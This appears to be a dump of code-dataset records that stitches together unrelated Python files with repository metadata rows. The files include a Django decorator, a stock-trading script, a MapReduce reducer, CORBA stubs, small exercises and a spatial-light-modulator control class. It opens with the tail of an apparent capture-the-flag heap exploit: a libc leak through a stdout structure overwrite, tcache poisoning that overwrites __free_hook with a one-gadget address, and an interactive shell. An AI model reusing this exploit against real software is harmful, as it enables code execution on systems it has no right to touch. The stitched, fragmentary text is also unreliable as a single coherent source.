realloc(0x100, '\x30'.ljust(8, '\0') + '\x60\x77') # guess stdout offset ?760
realloc(-1, '')
realloc(0x28, 'A')
realloc(-1, '')
# instead of using realloc, use malloc here to avoid realloc's *Little security check*
# __builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0)
# the code snippet below will fail the check
# realloc(0x28, 'A')
# realloc(-1, '') <-- fail here
malloc(0x28, 'A')
# overwrite _IO_write_base to leak libc address
realloc(0x28, p64(0x00000000fbad2887 + 0x1000) + p64(0) * 3 + '\x08')
libc.address = u64(r.recvn(6)+'\0\0') - 0x3ed8b0
print 'libc base:', hex(libc.address)
realloc(-1, '')
magic = libc.address + 0x4f322 # 0x10a38c, 0x4f2c5
# get shell
free('c')
free('c')
realloc(0x200, p64(libc.symbols['__free_hook']))
realloc(-1, '')
realloc(0x200, 'A')
realloc(-1, '')
realloc(0x200, p64(magic))
free('c')
r.interactive('>')
| [
"[email protected]"
] | |
cfeeef6a5a104412510c37699c7fd0e5884ed194 | c2c4ec34e9818fb12fbdb2b97fd4a3a497a9f250 | /account/decarators/decorator.py | 7563649c32053f89562ea2b9e88e2a986fa5a757 | [] | no_license | ismayilov1995/Todo_Django_Rest_API | e9c3e1f7cfbdfbaa058f742bcca2eab695ca8d34 | 74065f2ca864f774a6bd51a5b4c2ae6db683981a | refs/heads/master | 2020-11-30T06:45:02.071670 | 2019-12-31T10:50:22 | 2019-12-31T10:50:22 | 230,336,268 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 294 | py | from django.shortcuts import HttpResponseRedirect, reverse
from functools import wraps
def anonymous_required(func):
    """Redirect authenticated users to the main page; let anonymous users through."""
    @wraps(func)
    def wrap(request, *args, **kwargs):
        if request.user.is_authenticated:
            return HttpResponseRedirect(reverse("mainPage"))
        return func(request, *args, **kwargs)
    return wrap
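# Minimal usage sketch (view and template names are illustrative only):
#   @anonymous_required
#   def login_view(request):
#       return render(request, "login.html")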
| [
"[email protected]"
] | |
f28590b72d0df2f8c472d4388db457889bd494e7 | db5e6b310e20651b53621d01d59e432e2803da4e | /Stock_market/python_scripts/command_centre.py | 35f4bf1cd576caf036f7817789ad709f1af4316a | [
"Apache-2.0"
] | permissive | stanleychilton/portfolio | eb9f06e27c7869c7b8db4aaceaa0ae9cb16aee05 | 78a72b45fd2e3e5767ccf4261387c770181560be | refs/heads/master | 2023-03-14T06:28:36.482780 | 2023-03-08T01:42:16 | 2023-03-08T01:42:16 | 216,955,285 | 0 | 0 | null | 2022-06-21T17:40:38 | 2019-10-23T02:56:16 | PHP | UTF-8 | Python | false | false | 906 | py | import sell_stocks as ss
from datetime import datetime
from time import sleep
def time_until_end_of_day(dt=None):
    """Seconds remaining until midnight for dt (default: now)."""
    if dt is None:
        dt = datetime.now()
    return ((24 - dt.hour - 1) * 60 * 60) + ((60 - dt.minute - 1) * 60) + (60 - dt.second)
while True:
    now = datetime.now()
    dt_string = now.strftime("%H%M")
    print(dt_string)
    # Trade only inside the 01:30-07:20 window; otherwise liquidate holdings.
    if "0130" < dt_string < "0720":
        print("here")
        exec(open('buy_stocks.py').read())
        exec(open('purchased_stocks.py').read())
    else:
        ss.sell_all()
    #exec(open('pull_all_stocks.py').read())
    #exec(open('lowest_stocks.py').read())
    sleep_time = time_until_end_of_day()+5430
    print("sleeping for", sleep_time)
    if sleep_time <= 0:
        pass
    else:
        sleep(sleep_time)
        exec(open('updating_stocks.py').read())
| [
"[email protected]"
] | |
c7d594d40357f0020fc584144b499f0395fe4d45 | 4f4dd11bf460ac511cc6d023adaee585862c6938 | /pawenshu1.py | c1388df5c3a096b61a13fbfbce7016a5e68ef522 | [] | no_license | yijiangqingfeng/pawenshu | b14524fd43436064160cc4942dca97c08c335928 | 2faf5b4f6099f0d523a9dd08b7b0d18940e4f0db | refs/heads/master | 2023-03-06T02:27:18.351054 | 2021-02-21T12:58:01 | 2021-02-21T12:58:01 | 340,678,948 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 107 | py | from selenium import webdriver
import time
bro = webdriver.Chrome(executable_path=r'爬虫\chromedriver.exe') | [
"[email protected]"
] | |
76a49c26502a7d0a1ef66b31c48e747ee7d4847c | e70c75a33244e82de3ad1bd5b340bb0aa6b22ae9 | /task8/model2/reducer2.py | da078274e03dc3bf8185c029a5639cb31e2a534d | [] | no_license | joansanchez/MapReduce | e4ecb532f567a4e03241ff673e57332f96429445 | 91cda920cc4a5b5bd27b0a1f8c78b8d122bea4f5 | refs/heads/master | 2020-03-31T02:48:46.700098 | 2018-10-23T18:57:09 | 2018-10-23T18:57:09 | 151,840,674 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 811 | py | #!/usr/bin/env python2
#reducer2.py
import sys
prev_decade = None
values = []
first = 1
def getFinalAverage():
str1 = ''.join(values)
newValues = str1.strip().split(",")
averageDcd = sum(map(float,newValues))
return averageDcd/len(newValues)
for line in sys.stdin:
line = line.strip().split("\t")
decade = line[0]
if decade != prev_decade and prev_decade is not None:
average = getFinalAverage()
g = round(average,1)
print (prev_decade + "\t" + str(g) + "\t")
values = []
first = 1
prev_decade = decade
if first == 0:
values.append(",")
else:
first = 0
values.append(line[1])
if prev_decade is not None:
average = getFinalAverage()
g = round(average,1)
print (prev_decade + "\t" + str(g) + "\t")
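# Sketch of the expected stdin (tab-separated mapper output sorted by key),
# assuming one temperature reading per line:
#   1950\t12.3
#   1950\t14.1
#   1960\t13.7
# which prints "1950\t13.2" and "1960\t13.7".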
| [
"[email protected]"
] | |
4378080d73d79db22e26768ee1aa3ea5ad18f02d | 696799b824503429a3ac65ebdc28890bfbcaebe0 | /spell/spell/lib/hifly/interface/_GlobalIDL__POA/__init__.py | 07fbcb34cfc2b1832d30ca8d1b51ba72cb065042 | [] | no_license | CalypsoCubesat/SPELL_GUI_4.0.2_win32_x86 | a176886b48873b090ab270c189113a8b2c261a06 | 9275ecfff2195ca4d4c297f894d80c1bcfa609e3 | refs/heads/master | 2021-08-03T08:04:25.821703 | 2019-10-28T04:53:50 | 2019-10-28T04:53:50 | 217,968,357 | 0 | 0 | null | 2021-08-02T17:03:44 | 2019-10-28T04:50:59 | Python | UTF-8 | Python | false | false | 880 | py | # DO NOT EDIT THIS FILE!
#
# Python module _GlobalIDL__POA generated by omniidl
import omniORB
omniORB.updateModule("spell.lib.hifly.interface._GlobalIDL__POA")
# ** 1. Stub files contributing to this module
import spell.lib.hifly.interface.TKCOMcorbaApplication_idl
import spell.lib.hifly.interface.TKCOMcorbaGUI_idl
import spell.lib.hifly.interface.TKCOMcorbaGUIlogInterest_idl
import spell.lib.hifly.interface.TKCOMcorbaGUIinstallation_idl
import spell.lib.hifly.interface.TKCOMcorbaProcessList_idl
import spell.lib.hifly.interface.TKCOMcorbaGUIinterest_idl
import spell.lib.hifly.interface.USERcorbaTypes_idl
import spell.lib.hifly.interface.USERcorbaManagerSync_idl
import spell.lib.hifly.interface.USERcorbaManager_idl
import spell.lib.hifly.interface.USERcorbaNotificationSource_idl
import spell.lib.hifly.interface.USERcorbaSession_idl
# ** 2. Sub-modules
# ** 3. End
| [
"[email protected]"
] | |
58aab337a2f07297187114095b4075ce7b4f5e1c | 768316ed72470715e641fda62a9166b610b27350 | /01-CodeChef-Begginer/263--Chef and Card Game.py | b1a78730b20668b518c61c5bc65f15d217f7b196 | [] | no_license | dhnesh12/codechef-solutions | 41113bb5922156888d9e57fdc35df89246e194f7 | 55bc7a69f76306bc0c3694180195c149cf951fb6 | refs/heads/master | 2023-03-31T15:42:04.649785 | 2021-04-06T05:38:38 | 2021-04-06T05:38:38 | 355,063,355 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 786 | py | # cook your dish here
def find_sum(elements):
total = 0
while(elements > 0):
total += int(elements % 10)
elements = int(elements / 10)
return total
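# e.g. find_sum(275) -> 2 + 7 + 5 = 14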
test_case = int(input())
for i in range(test_case):
size_of_list = int(input())
count_1 = 0
count_2 = 0
for j in range(size_of_list):
chef, morthy = map(int, input().split())
chef_total = find_sum(chef)
morthy_total = find_sum(morthy)
if chef_total > morthy_total:
count_1 += 1
elif chef_total == morthy_total:
count_1 += 1
count_2 += 1
else:
count_2 += 1
if count_1 > count_2:
print(0, count_1)
elif count_1 < count_2:
print(1, count_2)
else:
print(2, count_1) | [
"[email protected]"
] | |
833cdd4d3f3e09d7a3565d327be5460e9ca3fc9d | d6d206c7f74e59cacf795c2b06c97d952b897164 | /NewAudioServer/how_to_send.py | f4d5eb01f01424f937d6ff558232f0bb00df2c3d | [] | no_license | jacobyn/NewAudioServer | 514f2315ad67e449946043b89ac47863a3cf7539 | 6c637ab0ee634c7df7ce303859d6821e582db16b | refs/heads/master | 2020-05-22T04:05:33.722694 | 2016-09-19T00:55:33 | 2016-09-19T00:55:33 | 55,329,592 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | import requests
url = 'http://audio.norijacoby.com/analyze'
files = {'file': open('uploads/uploaded2.wav', 'rb')}
r = requests.post(url, files=files)
print(r.text)
| [
"[email protected]"
] | |
044d8947166c003ced67ee4881e274bcb4a3d450 | 6ae343f0d46bc9a8a96fa517b9acfaafdded7636 | /TbTe/timebasedtaskexecution.py | 95191c66156b64849059ef4dbfc6a53480eadb52 | [] | no_license | adij30/TimeBasedTaskExe | ed6ffd40095e476f52f5c44cc39b293e71811b6a | 46f3e63a6316364b5ad7b334a59fbcdb7006833a | refs/heads/master | 2022-11-05T05:33:53.140360 | 2020-06-28T13:59:06 | 2020-06-28T13:59:06 | 275,616,194 | 0 | 0 | null | 2020-06-28T15:42:38 | 2020-06-28T15:42:37 | null | UTF-8 | Python | false | false | 3,445 | py | from datetime import datetime
class TimeBaseTaskExe:
def __init__(self, tasktype, name, starttm, endtm):
self.tasktype = tasktype
self.name = name
self.starttm = starttm
self.endtm = endtm
def timebased(self):
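        # Returns True while now is inside the window, False once the window
        # has already passed today, and the start time if it is still ahead.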
print('Your Entered Input: ')
print(TaskType, User, StartTime, EndTime)
print('Output:')
current_time = datetime.now().time()
if self.starttm < current_time < self.endtm:
return True
elif self.starttm < self.endtm < current_time:
return False
elif current_time < self.starttm < self.endtm:
return self.starttm
def enhancedtimebased(self):
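        # Returns True while inside the window on one of the two chosen
        # weekdays; otherwise returns the next "<day> <start time>" to run.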
current_time = datetime.now().time()
current_day = datetime.now().weekday()
current_day_name = datetime.today().strftime("%A")
day_name = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
print('Your Entered Input: ')
print(TaskType, User, StartTime, EndTime, day1, day2)
print('Output:')
if current_day_name == day1 or current_day_name == day2:
if self.starttm < current_time < self.endtm:
return True
elif self.starttm < self.endtm < current_time:
if current_day_name == day1:
return '{} {}'.format(day2, self.starttm)
if current_day_name == day2:
return '{} {}'.format(day1, self.starttm)
elif current_time < self.starttm < self.endtm:
if current_day_name == day1:
return '{} {}'.format(day1, self.starttm)
if current_day_name == day2:
return '{} {}'.format(day2, self.starttm)
else:
d1 = day_name.index(day1)
d2 = day_name.index(day2)
l1 = [d1, d2]
l1.sort()
if l1[-1] < current_day:
return '{} {}'.format(day_name[l1[0]], self.starttm)
else:
for i in l1:
if i > current_day:
return '{} {}'.format(day_name[i], self.starttm)
def __str__(self):
return f'\n {self.__dict__}'
def __repr__(self):
return str(self)
while True:
TaskType = input('Enter your Task Type(Email,Call,SMS):', )
User = input('UserName:', )
while True:
StartTime = input('Enter a Start time in 24Hours format as HH:MM:SS :', )
Start_Time = (datetime.strptime(StartTime, '%H:%M:%S').time())
        EndTime = input('Enter an End time in 24Hours format as HH:MM:SS : ')
        End_Time = (datetime.strptime(EndTime, '%H:%M:%S').time())
        if Start_Time > End_Time:
            print('StartTime must be less than EndTime, enter again')
else:
break
timebase = TimeBaseTaskExe(TaskType, User, Start_Time, End_Time)
print('T/t-TimeBased\nE/e-EnhancedTimeBased')
option = input("Choose your option please T/t OR E/e:")
if option == 'T' or option == 't':
print(timebase.timebased())
break
elif option == 'E' or option == 'e':
print('Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday')
day1 = input('Enter 1st day for Session(must entered as shown):',)
day2 = input('Enter 2nd day for Session(must entered as shown):',)
print(timebase.enhancedtimebased())
break
| [
"[email protected]"
] | |
49673bf0ccf5e67529f0847dc6e3444dfe3396cb | 9e3af8a40b53244722df812ef82edb09c659665f | /animate.py | 7476fab1b1d07cf4f39c5904951f9c2e8b58deab | [] | no_license | joemoore94/PlanetSimulation | 3888e20b8ae444cce39a3feb13623ebce67e5e22 | 1c02d987bdd3388dbc17db5a3529b2e39a084e2b | refs/heads/master | 2022-10-02T10:53:44.981180 | 2020-06-06T04:44:36 | 2020-06-06T04:44:36 | 269,868,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 817 | py | import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
import sys
max = int(sys.argv[1])
s,x,y = np.loadtxt(f'particles/0.dat', usecols=(0,1,2), unpack=True)
for i in range(1,max):
s1,x1,y1 = np.loadtxt(f'particles/{i}.dat', usecols=(0,1,2), unpack=True)
s = np.column_stack((s,s1))
x = np.column_stack((x,x1))
y = np.column_stack((y,y1))
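# after stacking, each array has shape (n_particles, n_frames):
# rows index particles, columns index the saved time steps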
lim = 100
fig, ax = plt.subplots(figsize=(8,8))
ax.set(xlim=(-lim, lim), ylim=(-lim, lim))
scat = ax.scatter(x[0], y[0], color='black')
circ = plt.Circle((0,0),radius=5,fc='yellow')
plt.gca().add_patch(circ)
def animate(i):
    # each column is one saved frame: frame i selects that column for every particle
    x_i = x[:, i]
    y_i = y[:, i]
    scat.set_offsets(np.c_[x_i, y_i])
    scat.set_sizes(s[:, i])
    #print(x_i,y_i)
anim = FuncAnimation(fig, animate, interval=1, frames=max)
plt.show()
| [
"[email protected]"
] | |
acf6c3c89fcd4c3c2e8ce49f3b795c8c5d49f20b | 4c678220177be1af3a89eefe5fef77b07de7f827 | /lesson_13/examples/position_in_file.py | 63ffc22896b0852c0f0ee3b80945df293bf8e3c3 | [] | no_license | Vladyslav92/PythonIntro02 | cc0aa4eb9f6376cd59be97e3d95a462ff8d90e83 | 43415a4b6c15bdfde040b5a8b498d822c9c3fcd2 | refs/heads/master | 2020-07-22T09:52:01.199759 | 2019-09-08T18:38:09 | 2019-09-08T18:38:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 751 | py | """
help(src.seek)
help(src.tell)
help(src.flush)
"""
import os
print(os.SEEK_SET)
print(os.SEEK_CUR)
print(os.SEEK_END)
filename = '/tmp/data.txt'
with open(filename, 'w') as fh:
fh.write("Hello World!\nHow are you today?\nThank you!")
print(os.path.getsize(filename)) # 42
with open(filename) as fh:
print(fh.tell()) # 0
row = fh.readline()
print(row) # Hello World!
print(fh.tell()) # 13
fh.seek(-7, os.SEEK_CUR)
print(fh.tell()) # 6
row = fh.readline()
print(row) # World!
print(fh.tell()) # 13
fh.seek(0, os.SEEK_SET)
print(fh.tell()) # 0
print(fh.read(5)) # Hello
fh.seek(-4, os.SEEK_END)
print(fh.tell()) # 38
print(fh.read()) # you!
print(fh.tell()) # 42 | [
"[email protected]"
] | |
14bfc4cff431f2c3f869eb5c1099612f78111145 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/324/usersdata/284/89554/submittedfiles/divisores.py | 13c2b3b92f659170432266e6544e618b11ce359a | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | # -*- coding: utf-8 -*-
import math
n=int(input('enter the number of multiples: '))
a=int(input('enter a value: '))
b=int(input('enter a value: '))
for i in range(1, n//2+1):  # integer division: range() needs an int bound
    if (a*i) != (b*i):
        x = a*i
        y = b*i
        print(x)
        print(y)
| [
"[email protected]"
] | |
01edac53fd98800b3cf4fe2b411f538c61d7a31d | ac2ddcba77341c78963e3d885fc9792fa09aa082 | /src/xp/ngramXP.py | 8dd1de27611573e549e4991018e5beec136415e3 | [] | no_license | l3robot/PP-Predict | d6dc987a706ea8c9c2f2c832b3ae84c7afb2f57a | b75952eea8c11a124f8ad788c3e274201e7774d6 | refs/heads/master | 2021-01-18T21:34:24.334556 | 2017-03-09T19:35:06 | 2017-03-09T19:35:06 | 84,369,485 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 883 | py | import json
import numpy as np
from sklearn.svm import LinearSVC
from bow.bagOfWords import BagOfWords
from bow.bowAndLearner import BowAndLearner
from bow.bowPreFilter import BowPreFilter
from xp.gridSearch import gridSearch2D
from visual.graphs import save2DGridSearch
def condition(h1, h2):
return h1 <= h2
def ngramXP(X, y, ngram):
print(' +ngram : begin with ngram {}'.format(ngram))
bow = BagOfWords(ngram).fit(X)
learner = LinearSVC()
mixed_learner = BowAndLearner(bow, learner)
lowBounds = np.arange(0, 30, 1)
highBounds = np.arange(20, 70, 1)
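    # exhaustive 2-D sweep over (lowBound, highBound) pairs; `condition` keeps only pairs with low <= high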
ans = gridSearch2D(X, y, mixed_learner, lowBounds, highBounds, condition, method='five2')
save2DGridSearch(ans[1], ans[2], ans[3], 'borne basse', 'borne haute', ngram)
    with open('results-{}.json'.format(ngram), 'w') as f:
        json.dump('{}'.format(ans), f)
return ans
| [
"[email protected]"
] | |
ca70145663e5bd29f1a2419e6da9a5f5ac77a9dc | bc9a725ea14024b38d48e282b275f386251ca28c | /python/web/mysite/blog/migrations/0002_article_pub_time.py | e24a2983623db6b81e18d7f36350f7beb34076fb | [] | no_license | hushiking/work | ff431d15c2bd47268f05a6080bc00d0e83d7b023 | 9b17bf4cb5addfd5d089741d205fb5413ffa41d3 | refs/heads/master | 2020-12-02T21:12:07.170000 | 2018-07-30T04:43:53 | 2018-07-30T04:43:53 | 96,269,457 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-04 08:18
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='pub_time',
field=models.DateTimeField(auto_now=True),
),
]
| [
"[email protected]"
] | |
3fcc137cb41c867124bea9f3c0ceaf7aeceeb17e | 23dcfa80f3fa582d21991312c7ccf52828d752cd | /measure_response_matrix/pySLM/definitions.py | bd62976583d483af266b4aed128df02a6b3f1353 | [
"MIT"
] | permissive | XinLuETH/characterization-of-response-matrix | 56a0e376c5cbc25e2a9d848401c50c3659b28cf0 | 70b9d22d050d855214d080ba8f5155f977f5d1cd | refs/heads/master | 2021-08-11T08:38:42.480558 | 2017-11-13T12:25:27 | 2017-11-13T12:25:27 | 110,544,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,808 | py | __author__ = 'Chronis'
import numpy as np
from scipy.special import j1
from astropy.io import fits
import pygame, os, time, pickle
import win32api
from tkinter import *
from tkinter import ttk
from tkinter import filedialog
import matplotlib
matplotlib.use('TkAgg')
import matplotlib.pyplot as plt
import matplotlib.image as mplimg
from matplotlib.colors import Normalize
from matplotlib import cm
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
class SLM:
"""
    A class that enables writing an image to the Holoeye SLM, seen as a second screen
    with dimensions 1024x768 for the SLM LC-2012 and 1920x1080 for the SLM Pluto
"""
def __init__(self):
# get path that file is saved in
self.path = os.path.dirname(os.path.realpath("__file__"))
# find connected screens
screens = win32api.EnumDisplayMonitors()
if len(screens) < 2:
raise UserWarning('No second screen connected')
self.hdc = screens[1][0] # handle of second screen PYHANDLE
self.dim = screens[1][2] # screen dimensions
self.left = self.dim[0]
self.top = self.dim[1]
self.right = self.dim[2]
self.bottom = self.dim[3]
self.width = abs(self.right-self.left)
self.height = abs(self.bottom-self.top)
if self.width == 1024:
self.SLM_type = "LC-2012"
else:
self.SLM_type = "Pluto"
self.size = (self.width, self.height)
self.dimensions = (self.width, self.height, 3)
# set Windows ENVIRONMENTAL VARIABLE of SDL window position to the top-left corner
# of the second screen
os.environ['SDL_VIDEO_WINDOW_POS'] = "%d,%d" % (self.left, self.top)
pygame.display.init()
self.screen = pygame.display.set_mode(self.size)
# create surface object
self.surface = pygame.surfarray.make_surface(np.zeros(self.dimensions, dtype=np.uint8))
self.screen.blit(self.surface, (0, 0))
pygame.display.flip()
self.pxarray = []
self.maps = self.load_maps() # dictionary to store phase maps imported from file
self.active = False
# SLM pixel size
if self.SLM_type == "LC-2012":
self.pixelSize = 36
elif self.SLM_type == "Pluto":
self.pixelSize = 8
def create_reference_array(self):
"""
Reference surface pixels with numpy array. Every change made in the array will
automatically change the pixels in the surface. Ideal for fast operations.
:return:
"""
self.active = True
self.pxarray = pygame.surfarray.pixels3d(self.surface)
pygame.display.flip()
return
def delete_reference_array(self):
"""
Delete previously referenced array
:return:
"""
del self.pxarray
return
def load_maps(self):
"""
Import previously used phase maps that are stored in phase_maps.p
:return:
"""
fname = self.path + '\\phase_maps.p'
if os.path.isfile(fname):
return pickle.load(open(fname, 'rb'))
else:
return {}
def save_maps(self):
"""
Save imported map to phase_maps dictionary pickle file
:return:
"""
fname = self.path + '\\phase_maps.p'
pickle.dump(self.maps, open(fname, 'wb'))
return
def update(self):
"""
Get buffer of second screen
:return:
"""
pygame.display.update()
return
def quit(self):
"""
Quits display
:return:
"""
pygame.display.quit()
return
def draw(self, p):
"""
Draw array onto second screen.
:param p: p is an uint8 numpy array with the correct dimensions
:return:
"""
self.active = True
surface = pygame.surfarray.make_surface(p)
self.screen.blit(surface, (0, 0))
pygame.display.flip()
return
def four_quadrants(self, value, center):
"""
Make a matrix representing the four quadrants phase map
with four 0,value alternating regions
:param value: Usually value[0]=255, value[1]=pi but can change
:param center: Center (x0,y0) of four quadrants
:return:None
"""
        if not((0 < value[0] < 256) and (0 < value[1] < 256)):
            raise ValueError('values must be unsigned 8bit, not %s' % str(value))
_x = int(center[0])
_y = int(center[1])
        four_q = np.ones((self.width, self.height), dtype=np.uint8)*value[0]  # assume value[0] is the background gray level (np.zeros made this multiplication a no-op)
four_q[_x:-1, 0:_y] = value[1]
four_q[0:_x, _y:-1] = value[1]
return four_q
def import_phase_map(self, file):
"""
Imports an phase map stored in a file and saves it in an
numpy array for use on the SLM
:param file: A .txt or .fits file of a phase map
:return: write an 8bit array of the correct dimensions in maps dict
"""
filename, extension = os.path.splitext(file)
flag = False
if extension == '.txt':
p = np.loadtxt(file, dtype=int, delimiter=' ')
            if np.shape(p) == (self.height, self.width):
                p = p.T  # transpose first so a (height, width) map is still accepted
            if np.shape(p) != self.size:
                return
m = np.zeros((self.width, self.height, 3), dtype=np.uint8)
m[:, :, 0] = p
m[:, :, 1] = p
m[:, :, 2] = p
self.maps[os.path.basename(filename)] = {'data': m}
elif extension == '.fits':
hdu = fits.open(file)
p = fits.getdata(file)
if np.shape(p) == self.size and np.max(p)<3:
self.maps[os.path.basename(filename)] = {'map': p}
flag = True
elif np.shape(p) == self.size and np.max(p)>3:
m = np.zeros((self.width, self.height, 3), dtype=np.uint8)
m[:, :, 0] = p
m[:, :, 1] = p
m[:, :, 2] = p
self.maps[os.path.basename(filename)] = {'data': m}
else:
print("Wrong dimensions ")
elif extension == '.bmp':
p = pygame.image.load(file)
p = pygame.surfarray.array3d(p)
self.maps[os.path.basename(filename)] = {'data': p}
else:
raise UserWarning('File extension %s not supported.' % extension)
# if np.shape(self.maps[filename]) != (1024, 768, 3):
# raise UserWarning('Wrong dimensions for SLM of size %i x %i (x %i)' % (self.width, self.height, 3))
# self.save_maps()
return filename, flag
def airy(self, r, F, l, I0):
"""
Airy pattern
:param r: radial distance from star
:param F: F number
:param l: wavelength
:param I0: Max intensity
:return:
"""
if r == 0:
return I0
x = np.pi*r*self.pixelSize/(l*1e-3*F)
I = I0*(2*j1(x)/x)**2
return I
def lorentzian(self, r, a, b):
"""
Creates the value of the lorentzian at distance r with center at a and scale b
and re-normalizes to 1
:param r: distance from star center
:param a: position of star center
:param b: scale/intensity
:return: value
"""
l = 1/(np.pi*b*(((r-a)**2/b**2)+1))
norm = 1/(np.pi*b)
l /= norm
return l
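    # four_qs picks one of the two gray levels from the pixel's quadrant relative to the
    # star center; np.arctan returns values in [-pi/2, pi/2], so only the first clause of
    # `expr` can ever be satisfied.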
def four_qs(self, xp, yp, c, val1, val2):
"""
Calculates abstract four quadrants value for pixel x,y
:param xp: x in pixel coordinates
:param yp: y in pixel coordinates
:param c: (x,y) of star center
:param val1: value 1 of 4 quadrants phase mask
:param val2: value 2 of 4 quadrants phase mask
:return:
"""
xs, ys = c
x = xs-xp
y = ys-yp
if (x == 0 and y >= 0) or (y==0 and x > 0):
return val2
elif x == 0 and y<0 or (y==0 and x <= 0):
return val1
else:
pass
phi = np.arctan(y/x)
expr = (0 <= phi <= 0.5*np.pi) or (np.pi < phi < 1.5*np.pi)
if expr: # pixel is in first or third quadrant
return val2
else: # pixel is in second or fourth quadrant
return val1
def eight_octants(self, xp, yp, c, val1, val2):
"""
Method that creates 8octants phase mask
:param xp: pixel x coordinate
:param yp: pixel y coordinate
:param c: center coordinates in tuple (xc, yc)
:param val1: gray value 1
:param val2: gray value 2
:return:
"""
xs, ys = c
x = xp-xs
y = yp-ys
expr2 = lambda phi:(0.25*np.pi < phi)
expr1 = lambda phi:(0.25*np.pi <= phi)
expr3 = lambda phi:(-0.5*np.pi < phi < -0.25*np.pi)
expr4 = lambda phi:(-0.25*np.pi >= phi > -0.5*np.pi)
phi = 0
if x == 0 and y < 0:
return val2
elif x == 0 and y >= 0:
return val1
elif y==0 and x<0:
return val2
else:
phi = np.arctan(y/x)
if y > 0 and x > 0:
if expr2(phi): # pixel is in first or third quadrant
return val1
else: # pixel is in second or fourth quadrant
return val2
elif y < 0 and x < 0:
if expr1(phi): # pixel is in first or third quadrant
return val1
else: # pixel is in second or fourth quadrant
return val2
elif y < 0 and x > 0:
if expr3(phi): # pixel is in first or third quadrant
return val2
else: # pixel is in second or fourth quadrant
return val1
else:
if expr4(phi): # pixel is in first or third quadrant
return val2
else: # pixel is in second or fourth quadrant
return val1
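    # Vortex_coronagraph builds the complex coordinate map (x - xc - 0.5) + i*(y - yc - 0.5);
    # the vortex phase itself corresponds to the angle of each complex entry.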
def Vortex_coronagraph(self, xc, yc):
phase = np.empty(self.size, dtype=np.complex)
for (x, y), v in np.ndenumerate(phase):
z = complex(x-xc-0.5, y-yc-0.5)
phase[x, y] = z
return phase
def pixel_value(self, x, y, c1, c2, i1, i2, val1, val2, F1, F2, l1, l2, mask='FQPM'):
"""
        Calculates the weighted phase-mask value for pixel (x, y) from both stars
        :param x: pixel x coordinate
        :param y: pixel y coordinate
        :param mask: which mask type to apply ('FQPM' or 'EOPM')
:return:
"""
x1, y1 = c1
x1 += 0.5
y1 += 0.5
a1 = np.sqrt(x1**2+y1**2)
x2, y2 = c2
x2 += 0.5
y2 += 0.5
a2 = np.sqrt(x2**2+y2**2)
r1 = np.sqrt((x1-x)**2 + (y1-y)**2) # doesn't have to be an integer
r2 = np.sqrt((x2-x)**2 + (y2-y)**2)
k1_airy = self.airy(r1, F1, l1, i1)
k2_airy = self.airy(r2, F2, l2, i2)
norm_airy = k1_airy + k2_airy
k1_airy /= norm_airy
k2_airy /= norm_airy
if mask == 'FQPM':
val_airy = k1_airy*self.four_qs(x, y, c1, val1, val2) + \
k2_airy*self.four_qs(x, y, c2, val1, val2)
return val_airy
elif mask == 'EOPM':
val_airy = k1_airy*self.eight_octants(x, y, c1, val1, val2) + \
k2_airy*self.eight_octants(x, y, c2, val2, val1)
return val_airy
def open_real_psf(self, psf_file):
# choose image of real psf
hdu = fits.open(psf_file)
self.psf = hdu[0].data
self.psf = self.psf.T
try:
c = hdu[0].header['center'] # center of weighting funnction
c = c.split(sep=',')
y, x = c
self.real_center = [int(x), int(y)]
except:
print("center not found in header")
return None
return
def real_psf_weight(self, x, y, xc, yc):
"""
Find out how much pixel is from center and get value of weight from real psf
:param x:
:param y:
:param c: center of star to get weight for
:return: weight
"""
x_i = x - xc + self.real_center[0]
y_i = y - yc + self.real_center[1]
return self.psf[x_i, y_i]
def pixel_value_real_psf(self, x, y, c1, c2, val1, val2, i1, i2, psf_file):
"""
Value of pixel in phase mask for binary case
:param x:
:param y:
:param c1: center of primary star
:param c2: center of second star
:param val1: phase value 1
:param val2: phase value 2
:param i1: intensity of primary star
:param i2: intensity of secondary star
:param psf_file: file containing the already normalized and smoothed real psf
:return: value of phase mask
"""
x1, y1 = c1
x2, y2 = c2
r1 = np.sqrt((x1-x)**2 + (y1-y)**2) # doesn't have to be an integer
r2 = np.sqrt((x2-x)**2 + (y2-y)**2)
k1_real = i1*self.real_psf_weight(x, y, x1, y1)
k2_real = i2*self.real_psf_weight(x, y, x2, y2)
norm_real = k1_real + k2_real
k1_real /= norm_real
k2_real /= norm_real
val_airy = k1_real*self.four_qs(x, y, c1, val1, val2) + k2_real*self.four_qs(x, y, c2, val1, val2)
return val_airy
| [
"[email protected]"
] | |
